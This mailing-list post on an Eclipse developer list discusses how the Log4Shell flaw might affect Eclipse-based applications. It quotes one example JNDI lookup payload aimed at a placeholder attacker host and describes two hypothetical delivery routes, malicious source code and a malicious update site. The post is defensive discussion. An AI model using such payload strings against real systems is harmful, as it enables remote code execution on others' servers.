[
Date Prev][
Date Next][
Thread Prev][
Thread Next][
Date Index][
Thread Index]
[
List Home]
Re: [cross-project-issues-dev] log4j vulnerability in Eclipse?
|
I want to contribute to this discussion my understand on how an attack
on an Eclipse based application could be performed in practice. My
understanding is mostly based on [1], [2] and [3].
(My understanding is only based on a causal reading on the published
material, and I am by no beans a an expert in computer security, so
please don't place to much trust in this analysis!)
The Eclipse platform itself doesn't seem to be vulnerable (judging from
earlier messages in this thread) so this might be mostly theoretical,
but might be interesting nevertheless. There might be third party
Eclipse applications that are affected.
My understanding is that this vulnerability affects code that uses user
submitted data in log messages. When messages of the following form is
logged it can make Log4J download and execute arbitrary code:
"${jndi:ldap://attacker.com/a}". Let's call such log messages "bad log
strings".
This is more of a problem for web server applications than for desktop
applications like Eclipse. Web server applications might be attacked if
they log uses names or user agent strings. Attackers can actively seek
out and target vulnerable applications.
Desktop application that act as web clients can also be attacked, but
they probably pose harder targets. Attackers have to somehow trick users
to connect to malicious services and download malicious data.
The following are two situation that I came up with which could
potentially trigger the vulnerability in the Eclipse IDE (if it were
vulnerable, which is probably not the case):
* The users downloads malicious source code and compiles it using
Eclipse. During compilation Eclipse might log some data about the source
code which contain a bad log string.
* The user connects to a malicious software update site. Some data about
the site, for example its name, contains a bad log string. Eclipse logs
this data and triggers the vulnerability.
Again I want to stress the fact that it doesn't seem like the Eclipse
platform itself is vulnerable or distributes any version of Log4J which
are vulnerable.
BR,
Jens Lideström
[1]:
https://www.pcmag.com/news/countless-serves-are-vulnerable-to-apache-log4j-zero-day-exploit
[2]: https://www.lunasec.io/docs/blog/log4j-zero-day/
[3]: https://github.com/christophetd/log4shell-vulnerable-app